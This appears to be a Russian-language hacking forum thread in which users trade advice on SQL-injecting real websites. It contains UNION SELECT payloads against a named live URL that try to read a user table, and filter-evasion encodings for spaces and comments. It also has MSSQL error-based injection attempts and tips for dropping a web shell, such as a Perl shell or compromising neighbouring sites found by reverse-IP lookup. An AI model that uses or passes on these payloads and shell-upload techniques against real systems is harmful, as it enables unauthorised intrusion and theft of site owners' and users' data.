Доступна, но там ноль записей, пусто там, сравни вывод: Code: http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,10,11,count(*),13+from+dubwiki_user--+ и Code: http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+
Файлы конфигурации служб IIS7.0 по умолчанию расположены в папке Windows\System32\Inetsrv. * Applicationhost.config * Global web.config * Machine.config * Site web.config * App web.config в IIS6 таких файлов нет, преполагаю что настройки в реестре =(
Я оборвал запрос с помощью %23 Но не могу ничего использовать до %23 Тоесть допустим воткнуть конструукцию id=5+and+1=1%23 Помойму он пробелы не хочет виспринимать пробовал (+ %20 %09 %0a /**/ %0d %2b) Выделил те при которых пишет "Bad Request (Invalid URL)" при остольных SQL error При /**/ выводится просто "Bad Request попробовал id=6-1%23 SQL error
Byrger Пробуй без пробела,+... А может там нету иньекции? А может там запрет на and, union, select, etc?
всем прив. проблема в следующем - есть возможность лить на сайт файлы через скулю, но папка на запись, доступная из веба, в одном экземпляре ( по крайней мере я только одну нашел). но файлы с расширением пхп в этой папке не исполняются( выдает интернал сервер еррор). как мона получить шелл в данном случае? з.ы. пхтмл пробовал - не исполняется как пхп
Если в .htaccess ЗАПРЕТ на php, а не разрешение на html,etc, то можно попробывать залить perl шелл. Если же не нет, то через ReverseIP смотри соседние сайты и пробуй залить на них.
Оборвать то я строку смог а вот инъекцию туда вставить нет Она там есть так как результат что id=5%23 Один с id=5%23lalalal А вот перед %23 Ничего не получается вставить : (
Я конечно может чего то не понимаю... но судя по описанию там нет скули,нужна еще одна проверка на выполнение SQL кода допустим при id=5 у тебя выводит одну страницу то и при id=6-1 и id=4+1 или при id=5*1 должно вывести туже самую страницу. Если так оно тогда скуль!
Есть сервак Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1 на запросы типа (SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- пишет mofo Incorrect syntax near the keyword 'TOP'. @@version-- (select db_name())-- (select system_user)-- Выполняются без проблем. Как обойти?
1+or+1=(SELECT+1+max(TABLE_NAME)+FROM+INFORMATION_ SCHEMA.TABLES)-- mofo Line 1: Incorrect syntax near 'max'. id=1+or(1=(select(max(table_name))from[information_schema].tables))-- mofo An aggregate may not appear in the WHERE clause unless it is in a subquery contained in a HAVING clause or a select list, and the column being aggregated is an outer reference. ваще хз даж как это можно перевести....совокупности нет в запросе WHERE? все остальное из той темы ругается или на TOP или на FROM. Пробовал в разных регистрах
